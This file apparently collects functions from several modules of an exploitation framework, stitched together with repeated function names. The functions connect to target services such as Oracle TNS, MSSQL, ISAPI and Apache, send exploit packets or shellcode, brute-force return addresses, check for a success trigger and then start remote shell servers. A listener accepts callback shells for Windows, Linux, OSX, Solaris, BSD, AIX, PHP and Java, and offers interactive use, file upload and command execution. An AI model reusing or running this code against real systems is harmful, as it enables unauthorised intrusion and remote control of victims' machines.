def win32NonCallbackShellcodeCheck(self): """ Tries to connect to a bind shellcode on the remote server returns our new Node on success, otherwise returns None """ s = self.gettcpsock() try: self.log("WP> Attempting connection to Bind Mosdef on port %s:%d" % (self.target.interface, self.bindPort)) s.connect((self.target.interface, self.bindPort)) except: self.log("WP> Connection did not succeed to port %d" % self.bindPort) return None # got a connection, verify with GO handshake if self.checkTriggerWin32(s): self.log("WP> Got a Bind Mosdef socket!") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) #Need this if we use CreateThreadRecvExecWin32 newshell.argsDict["fromcreatethread"] = 1 newshell.node.startup() return newshell.node return None
def doGOMOSDEFWin32(self, s, currentNode=None): s.set_timeout(20) self.log("Trying to start MOSDEF...") import win32MosdefShellServer from win32Node import win32Node newshell = win32Node() if currentNode: pnode = currentNode else: pnode = self.argsDict["passednodes"][0] newshell.parentnode = pnode pnode.newNode(newshell) shell = win32MosdefShellServer.win32shellserver(s, newshell, logfunction=self.log) if not shell: self.log("Could not make a shell object from active socket") return 0 ret = shell.startup() if not ret: self.log("Failed to initialise MOSDEF") return 0 shell.started = 1 return newshell
def doOracleRun(self, header, oraret, seoffset, align): s = self.connect_to_host(self.host, self.port) if s == 0: self.log("Could not connect") self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) return 0 chunk = self.getOracleChunk(oraret, seoffset, align) self.log("Trying single shot attack") self.doRequest(s, header, chunk) self.websend(s, "\r\n") # allow some time for searchcode self.snooze(5) if self.checkTriggerWin32(s, falsepositive=1): self.log("Setting success flag") import win32MosdefShellServer node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) newshell.node.startup() return newshell.node else: s.close() # Oracle targets are single shot, we failed self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) return 0
def run(self): self.getargs() if not self.test(): return 0 self.log("Using password: %s" % prettyprint(self.password)) vername = TARGETS[self.version] self.setInfo("%s running against %s" % (NAME, vername)) s = self.connectTo() if not s: self.log("No connection...failed") return 0 s.sendall(self.password) if "WINDOWS" in vername.upper(): import win32MosdefShellServer from win32Node import win32Node node = win32Node() node.parentnode = self.argsDict["passednodes"][0] win32MosdefShellServer.win32shellserver(s, node, self.logfunction) node.startup() return node else: self.log("No version known for %s" % vername) return 0
def win32NonCallbackShellcodeCheck(self): """ Tries to connect to a bind shellcode on the remote server returns our new Node on success, otherwise returns None See msrpcexploit.py for an example of usage """ if self.callback != None and self.callback.ip == "0.0.0.0": # check for BindMosdef s = self.gettcpsock() try: self.log("Trying Bind Mosdef mode on port %d..."%self.callback.port) s.connect((self.target.interface, self.callback.port)) except: self.log("Connection did not succeed to port %d"%self.callback.port) self.setInfo("%s attacking %s:%d (failed)"%(self.name,self.host,self.port), showlog=True) return None else: return None # got a connection, verify with GO handshake if self.checkTriggerWin32(s): self.log("Got a Bind Mosdef socket!") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver(s, node,self.logfunction) newshell.argsDict["fromcreatethread"] = 1 newshell.node.startup() self.setInfo("%s attacking %s:%d (succeeded!)"%(self.name, self.host, self.port), showlog=True) return newshell.node return None
def doStageTwo(self, s): self.log("Got trigger!") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver(s, node, self.logfunction) newshell.node.startup() self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1) return newshell.node
def run(self): self.getArgs() s = self.gettcpsock() try: s.connect((self.host, self.port)) except: self.log("Failed to connnect") self.setInfo("%s: Failed to connect to port %s against host %s" % (self.name, self.port, self.host)) return 0 if self.version == 0: self.test() if self.version == 0: self.log("Could not auto-target against that host!") self.setInfo("%s: Failed to auto-target against host %s" % (self.name, self.host)) return 0 self.setInfo("%s Running against %s:%d" % (self.name, self.host, self.port)) self.log("Sending WMS_INIT") s.send(self.packetFragGen(WMS_INIT)) rsp = s.recv(256) # go for the kill self.log("Sending Exploit packet") s.send(self.buildKillPacket()) # do trigger stuff ret = self.checkTriggerWin32(s) if not ret: # 4 times total, createthreadcode can be slow :/ ret = self.checkTriggerWin32(s) if ret: from win32Node import win32Node import win32MosdefShellServer self.log("Got trigger!") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) newshell.node.startup() self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1) self.log("Thanks \\0/") return newshell.node else: self.log("No trigger for win32...failed to call GOcode?") self.setInfo("%s attacking %s:%d - (failed!)" % (NAME, self.host, self.port), showlog=1) return 0 return 1
def run(self): self.host = self.target.interface print "Attacking: %s" % self.host self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) if self.version == 0: self.log("Auto versioning not available") self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) return 0 self.info, self.align, self.retadd, self.seoffset = targets[ self.version] cdata = self.buildCdata(self.align, self.retadd, self.seoffset) s = self.connectToHost(self.host, self.port) if not s: self.log("Could not connect to TNS listener") return 0 if s: self.log("Connected to TNS listener at %s:%d" % (self.host, self.port)) TNS = tnslib.TNS() TNS.sendRawCommand(s, cdata) else: self.done = 1 if self.checkTriggerWin32(s): self.log("Setting success flag") self.setSucceeded() self.done = 1 import win32MosdefShellServer from win32Node import win32Node node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) ret = node else: s.close() if self.ISucceeded(): self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) return ret self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) return 0
def collectEchoMarker(self, s): """used for peek code""" import win32MosdefShellServer from win32Node import win32Node data = s.recv(4) if data == "ABCD": self.log("Got echo marker!") else: self.log("Got wrong marker: %s" % prettyprint(data)) return None self.log("Initializing Win32Node") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] win32MosdefShellServer.win32shellserver(s, node, self.logfunction) node.startup() self.log("Finished initializing win32Node") self.setInfo("%s Done (successfully stole socket!)" % self.name) return node
def handleGoCode(self, sock): ret=self.checkTriggerWin32(sock) if not ret: #try twice ret=self.checkTriggerWin32(sock) if ret: self.log("Got trigger!") node=win32Node() node.parentnode=self.argsDict["passednodes"][0] win32MosdefShellServer.win32shellserver(sock,node,self.logfunction) node.startup() self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1) return node else: self.log("No trigger for win32...failed to call GOcode?") self.setInfo("%s attacking %s:%d - (failed!)" % (NAME, self.host, self.port), showlog=1) return 0
def run(self): #first make socket connection to target 1433 self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) s = self.gettcpsock() #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.host, self.port)) except: self.log("Could not connect!") self.setInfo("%s attacking %s:%d (could not connect)" % (NAME, self.host, self.port)) return 0 sploitstring = self.makesploit() s.sendall(sploitstring) if self.checkTriggerWin32(s): self.log("Setting success flag") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) self.setInfo("%s Done" % self.name) return node try: result = s.recv(1000) except: result = "" self.log("result=" + prettyprint(result)) s.close() #failed? self.setInfo("%s attacking %s:%d (done)" % (NAME, self.host, self.port)) return self.ISucceeded()
def doKnownRun(self, header): # try the known range first self.log("Trying known target range") # pedantic max connect, initial connect should work fine max = 5 for retadd in known[0]: # the kill sock s = self.connect_to_host(self.host, self.port) if s == 0: self.log("Could not connect, retry") max = max - 1 if not max: self.log( "Max attempt of connect failures reached, exiting") self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) # free listener self.setState("done") return 0 else: chunk = self.getChunk(retadd) self.log("Trying retadd: [0x%.8X]" % retadd) self.doRequest(s, header, chunk) self.websend(s, "\r\n") # error messages might have 'G' so we check for 'GOOO' if self.checkTriggerWin32(s, falsepositive=1): self.log("Setting success flag") self.setSucceeded() import win32MosdefShellServer node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) newshell.node.startup() return newshell.node else: s.close() return 0
def checkisapiGO(self,s): """looks for isapi GOcode. Returns data pulled from web server if unsuccessful On success does handshake and """ data=self.webrecv(s,size=4) if data!="GGGG": return data self.log("ISAPI GO CODE DETECTED!") #otherwise we found it! #the next bytes are READCLIENT,WRITECLIENT, and CONTEXTPOINTER (4 bytes each, of course) import win32MosdefShellServer from win32Node import win32Node node=win32Node() node.parentnode=self.argsDict["passednodes"][0] #s is actually a socket object or an SSL object here newshell = win32MosdefShellServer.win32shellserver(s,node,self.logfunction) newshell.argsDict["isapidict"]={"ssl": self.ssl,"exploit":self} newshell.startup() node.startup() self.newnode=node self.succeeded=1 return ""
def run(self): self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d - (in progress)" % (NAME, self.host, self.port), showlog=1) self.s = self.gettcpsock() try: ret = self.s.connect((self.host, self.port)) except: self.log("Failed to connect") self.setInfo("%s attacking %s:%d - (failed to connect)" % (NAME, self.host, self.port), showlog=1) return 0 self.s.set_timeout(10) self.s.sendall("GET / HTTP/1.0\r\n" + "a\r\n" * 31 + self.shellcode + "\r\n" "\r\n") # check for BindMosdef mode if self.callback and self.callback.ip == "0.0.0.0": self.s = self.gettcpsock() import time time.sleep(0.5) print "[!] Trying BindMosdef connect to: %s:%d" % ( self.host, self.callback.port) try: self.s.connect((self.host, self.callback.port)) except: self.log("Failed to connect") self.setInfo("%s attacking %s:%d - (failed to connect)" % (NAME, self.host, self.port), showlog=1) return 0 ret = self.checkTriggerWin32(self.s) if not ret: #try twice ret = self.checkTriggerWin32(self.s) if ret: self.log("Got trigger!") node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( self.s, node, self.logfunction) newshell.node.startup() self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1) self.log("Thanks \\0/") return newshell.node else: self.log("No trigger for win32...failed to call GOcode?") self.setInfo("%s attacking %s:%d - (failed!)" % (NAME, self.host, self.port), showlog=1) return 0
def doBruteRun(self, header, startbrute, endbrute, brutestep): tries = endbrute - startbrute tries = tries / brutestep if not self.brute: tries = 1 self.log("Tries: %d, Step: [0x%.8X], Range: [0x%.8X] to [0x%.8X]" % (tries, brutestep, startbrute, endbrute)) max = self.maxconnect for i in range(0, tries): self.setProgress((float(i) / float(tries)) * 100) if self.getState() == self.HALT: self.log("Ending bruteforce run at [0x%.8X] after %d tries" % (startbrute, int(i))) self.setInfo("%s attacking %s:%d - done (aborted!)" % (NAME, self.host, self.port)) return 0 s = self.connect_to_host(self.host, self.port) if s == 0: self.log("could not connect, retry") max = max - 1 if not max: self.log( "Max attempt of connect failures reached, exiting") self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port)) return 0 # give main apache some time to recover time.sleep(1) # adjust tries, this one doesn't counnt i = i - 1 else: startbrute = self.sanitiseAdd(startbrute) chunk = self.getChunk(startbrute) self.log("Trying retadd: [0x%.8X]" % startbrute) self.doRequest(s, header, chunk) self.websend(s, "\r\n") if self.checkTriggerWin32(s, falsepositive=1): self.log("Setting success flag") self.setSucceeded() import win32MosdefShellServer node = win32Node() node.parentnode = self.argsDict["passednodes"][0] newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction) self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) newshell.node.startup() return newshell.node else: s.close() #We always always grab the socket - so this should never happen #if this triggers it implies we got a callback...which we don't do. #if self.ISucceeded() or self.done: # self.setInfo("%s attacking %s:%d - done (success!)"% (NAME, self.host, self.port)) # self.log("Success at [0x%.8X]"% startbrute) # return 1 startbrute = startbrute + brutestep # end of run, no success self.log("No success in brute run") return 0
def handleConnection(self, connection): try: connection.set_timeout(None) except: self.log("[!] likely an ipv6 socket, set_timeout not supported !") server = None if self.type == self.targets.index("LINUXEXECVE_INTEL"): self.log("Connected: Running a Linux server...") import linuxMosdefShellServer #time.sleep(10) newshell = unixShellNode() pnode = localNode() pnode.newNode(newshell) server = linuxMosdefShellServer.execveshellserver( connection, newshell) #server.addInitString(self.initstring) #server.addInitString("chrootbreak") server.startup() elif self.type == self.targets.index("LINUXMOSDEF_INTEL"): self.log("Connected, Linux MOSDEF ...") newshell = linuxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('Linux', 'i386')(connection, newshell) #shell=linuxMosdefShellServer.linuxshellserver(connection,newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index('OSXMOSDEF_INTEL'): self.log('Connected, OSX MOSDEF INTEL ...') newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('OSX', 'i386')(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("OSXMOSDEF_PPC"): self.log("Connected, OSX MOSDEF PPC ...") import osxMosdefShellServer newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = osxMosdefShellServer.osxshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("WIN32MOSDEF_INTEL"): self.log("Connected, running win32 MOSDEF server") import win32MosdefShellServer from win32Node import win32Node newshell = win32Node() pnode = localNode() pnode.newNode(newshell) shell = win32MosdefShellServer.win32shellserver(connection, newshell, logfunction=None) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"): self.log("Connected, Solaris MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisshellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"): self.log("Connected, Solaris x86 MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisx86shellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("BSDMOSDEF_INTEL"): self.log("Connected, BSD MOSDEF") import bsdMosdefShellserver newshell = bsdNode() pnode = localNode() pnode.newNode(newshell) shell = bsdMosdefShellserver.bsdshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_51_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.1') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_52_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.2') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("PHPMULTI"): newsocket = connection self.log("Starting up a %s server" % type) import phplistener from ScriptShellServer import phpshellserver node = ScriptNode() node.parentnode = self.engine.getLocalNode() shell = phpshellserver(newsocket, node) shell.startup() newshell = node server = shell elif self.type == self.targets.index("UNIXSHELL"): newsocket = connection self.log("Starting up Unix Shell") pnode = localNode() telnetshell = Telnet() telnetshell.sock = newsocket shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.log) newshell = unixShellNode() newshell.shell = shell shell.node = newshell pnode.newNode(newshell) server = shell elif self.type == self.targets.index("JAVA"): newsocket = connection self.log("Starting up a %s server" % type) from Nodes.JavaShellServer import javashellserver from JavaNode import JavaNode node = JavaNode() node.parentnode = self.engine.getLocalNode() shell = javashellserver(newsocket, node) shell.startup() newshell = node server = shell else: print "Don't know what type I am!" sys.exit(1) if self.mode == "interactive": print "Letting user interact with server" if server: server.interact() else: print "No server...exiting this shell..." elif self.mode == "Run one command": print "Running a command or set of commands" if self.uploadfiles != []: for f in self.uploadfiles: print "Uploading %s" % f # Why doesn't this use exploits/upload/upload.py then? print server.upload(f) print server.runcommand(self.command) ###insert your post-op stuff here!!! ###you might want: ###server.doexitthread(1) ###or server.runexitprocess() if server: server.disconnect() return